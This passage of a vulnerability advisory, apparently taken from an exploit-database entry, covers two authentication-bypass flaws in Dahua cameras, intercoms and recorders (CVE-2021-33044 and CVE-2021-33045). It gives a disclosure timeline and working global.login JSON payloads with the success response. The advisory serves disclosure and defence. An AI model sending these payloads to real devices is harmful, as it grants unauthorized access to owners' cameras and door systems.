\"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021.\n \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication.\n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>}\n\n[Example]\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"loginType\": \"Direct\",\n \"clientType\": \"NetKeyboard\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"Not Used\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020.\nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication.\n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"[REDACTED]\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Plain\",\n \"password\": \"admin\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n[ETX]\n\n", "sourceHref": "https://0day.today/exploit/36859", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-33045
